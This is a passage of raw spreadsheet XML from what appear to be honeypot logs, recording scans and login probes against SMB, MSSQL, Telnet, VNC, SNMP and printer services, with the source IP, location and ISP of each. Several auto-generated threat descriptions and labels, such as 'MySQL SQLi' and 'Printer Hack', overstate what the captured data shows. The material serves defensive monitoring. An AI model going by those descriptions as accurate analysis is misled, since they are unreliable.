    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;143&amp;&amp;62848&amp;&amp;NA&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7018"/>
    <s v="51.4368"/>
    <s v="49847"/>
    <s v="Pardazeshgar Ray Azma Co. Ltd."/>
    <s v="Pardazeshgar Rayazma Ltd."/>
    <s v="business"/>
    <s v="RAYNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,54373)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,63865)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,64351)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,60906)}&amp;&amp;{Data_SMB:Incoming connection (185.42.226.222,61348)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b92a:e2de"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Malicious connection attempt to a MySQL database was detected but no further information is available as it seems to be incomplete or unknown. This indicates potential exploitation of a vulnerability or unauthorized access attempt. Further analysis is needed to determine the full extent of the malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="152"/>
    <x v="152"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:07:20"/>
    <d v="2025-04-17T02:52:45"/>
    <d v="2025-04-30T14:07:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>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2000-01-11"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d00:5690"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="153"/>
    <x v="153"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:00:04"/>
    <d v="2025-04-30T13:42:31"/>
    <d v="2025-04-30T14:00:04"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Bốn"/>
    <s v="Quận Bốn"/>
    <s v="9645071"/>
    <s v="NA"/>
    <s v="10.7644"/>
    <s v="106.696"/>
    <s v="135944"/>
    <s v="VinhNam Commercial informatics service corporation"/>
    <s v="SPT"/>
    <s v="business"/>
    <s v="Saigon Postel Corporation"/>
    <s v="2009-07-23"/>
    <s v="SPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b45d:ac4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="154"/>
    <x v="154"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:57:29"/>
    <d v="2024-05-03T22:53:00"/>
    <d v="2025-04-30T13:57:29"/>
    <n v="1277"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;143&amp;&amp;39367&amp;&amp;61460&amp;&amp;57056&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="Solusinet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63558)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64117)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59765)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60160)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,57715)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,57576)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,58123)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63588)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64240)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,50805)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,51343)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59997)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60330)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,56192)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,56724)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,58556)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63600)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,54934)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55586)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60233)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60829)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,61257)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,61969)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,51945)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,53169)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,53733)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64544)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,65310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59920)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60342)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59208)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63352)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63722)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64038)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64596)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62366)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62964)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55200)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55756)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63199)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63551)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a4:c2ed"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An incoming network connection from IP address 103.164.194.237 to port 55,756 was detected._x000a_This could be an attempted unauthorized access or reconnaissance activity._x000a_Further investigation is required to determine the intentions behind this action. &amp;&amp; Possible malicious activity involves an unauthorized user accessing shared resources using SMB protocol, attempting to authenticate with administrator-level privileges. The success of the authentication suggests the attacker may have compromised credentials or exploited a vulnerability. This could be a precursor to further malicious actions such as data theft or system takeover. &amp;&amp; An attempt was made to authenticate as a user named &quot;User&quot; with administrative privileges on a Windows share using basic authentication credentials, which could be an indication of unauthorized access or malicious activity. This is because users should not typically have such credentials. The use of these credentials suggests possible exploitation of a vulnerability. &amp;&amp; The data indicates that an attempt was made to access Microsoft SQL database, which could be a sign of potential database exploitation or unauthorized access attempt. This might indicate malicious activity targeting sensitive database information. The attacker is likely probing for vulnerabilities in the database's security. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources. This could be a reconnaissance or lateral movement attempt by an attacker. The source IP may be spoofed but it indicates malicious intent. &amp;&amp; An incoming connection from an unknown IP address suggests a potential hacking attempt to access or exploit the SMB service. The specific IP address may be associated with malicious activity. This could indicate a brute-force attack or an attempt to spread malware through the SMB port. &amp;&amp; An unknown system is attempting to connect to a shared resource on our network. The IP address 103.164.194.237 is making this connection from an external location. This could be a potential threat if unauthorized access is being sought. &amp;&amp; A user has authenticated on a shared resource using basic credentials._x000a_This indicates an attempt to access sensitive files or folders._x000a_Possible malicious intent may be involved as authentication bypassing. &amp;&amp; An unauthorized user has gained authentication on a shared SMB service by using basic credentials, potentially allowing them to access and manipulate files or system resources. This could be an attempt to gain elevated privileges or steal sensitive information. The user may be attempting to escalate their access rights within the network."/>
    <s v="SMB Scanning &amp;&amp; SMB Auth &amp;&amp; SMB Bruteforce &amp;&amp; SMB Scanning &amp;&amp; SMB Scan &amp;&amp; SMB Brute &amp;&amp; SMB Auth &amp;&amp; SMB Login"/>
  </r>
  <r>
    <x v="155"/>
    <x v="155"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:52:08"/>
    <d v="2025-04-30T13:51:01"/>
    <d v="2025-04-30T13:52:08"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P3"/>
    <s v="Bagmati Province"/>
    <s v="Lalitpur"/>
    <s v="Patan"/>
    <s v="1282931"/>
    <s v="NA"/>
    <s v="27.6766"/>
    <s v="85.3142"/>
    <s v="23752"/>
    <s v="Nepal Telecommunications Corporation"/>
    <s v="Nepal Telecommunications Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71c7:e205"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="156"/>
    <x v="156"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:48:40"/>
    <d v="2024-11-23T11:46:06"/>
    <d v="2025-04-30T13:48:40"/>
    <n v="40"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1990-03-24"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ba7:380a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="157"/>
    <x v="157"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:47:59"/>
    <d v="2024-04-14T10:44:05"/>
    <d v="2025-04-30T13:47:59"/>
    <n v="143"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_MYSQL_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;1080&amp;&amp;NA&amp;&amp;3306&amp;&amp;110&amp;&amp;33394&amp;&amp;9100&amp;&amp;6379&amp;&amp;161&amp;&amp;3389&amp;&amp;23&amp;&amp;5432&amp;&amp;1433&amp;&amp;5900&amp;&amp;1521&amp;&amp;53191&amp;&amp;443&amp;&amp;6667"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="101"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YTQkrY'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1899"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unauthorized access to network management system, possible scanning or probing activity using a well-known community string &quot;public&quot;. This indicates an attempt to gather information about the targeted network's configuration and topology. The use of &quot;public&quot; community string suggests a lack of security awareness. &amp;&amp; The log indicates that there was an attempt to access or exploit a MySQL service, potentially for malicious purposes such as unauthorized data retrieval or database tampering. This could be a brute force attack or a targeted attempt to gain access to sensitive information. The lack of success in accessing the database suggests it may have been blocked by security measures. &amp;&amp; The presence of this log entry indicates a possible printer exploitation attempt, as it suggests an unauthorized device is attempting to gain information about the printer's configuration. This could be part of a larger print spooler vulnerability exploit. It may also indicate an attempt to discover sensitive printer settings. &amp;&amp; Malicious actor attempted printer job information extraction, likely for reconnaissance or exploitation purposes. This could be a precursor to unauthorized print jobs or further attacks on the system. The goal is to gather sensitive information about the printer's configuration and functionality. &amp;&amp; Possible malicious activity is a printer exploitation attempt, where an attacker is sending a command to gather information about the printer's capabilities and settings. This could be used to identify vulnerabilities or gain unauthorized access. The attacker may be attempting to exploit the printer for further attacks or data exfiltration. &amp;&amp; The data suggests a potential attempt to exploit a printer's configuration vulnerability, as it attempts to send an invalid printer control sequence._x000a_This behavior is unusual and may indicate malicious activity intended to gain unauthorized access or extract sensitive information from the targeted system._x000a_It appears to be a reconnaissance step, trying to gather information about the device's settings."/>
    <s v="MySQL SQLi &amp;&amp; Printer Hack &amp;&amp; Printer Hijack &amp;&amp; Printer Hack &amp;&amp; Print Job Exploitation"/>
  </r>
  <r>
    <x v="158"/>
    <x v="158"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:44:48"/>
    <d v="2024-11-29T12:46:25"/>
    <d v="2025-04-30T13:44:48"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.23278"/>
    <s v="106.845"/>
    <s v="58369"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="residential"/>
    <s v="PT Patra Badak Arun Solusi"/>
    <s v="2023-11-13"/>
    <s v="IDNIC-PBAS-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.187.31.242,62119)}&amp;&amp;{Data_SMB:Incoming connection (115.187.31.242,62619)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bb:1ff2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="159"/>
    <x v="159"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:42:46"/>
    <d v="2025-04-09T08:33:02"/>
    <d v="2025-04-30T13:42:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="40"/>
    <s v="Calabarzon"/>
    <s v="Rizal"/>
    <s v=" Muntinlupa"/>
    <s v="1699076"/>
    <s v="NA"/>
    <s v="14.3903"/>
    <s v="121.048"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="GLBB"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
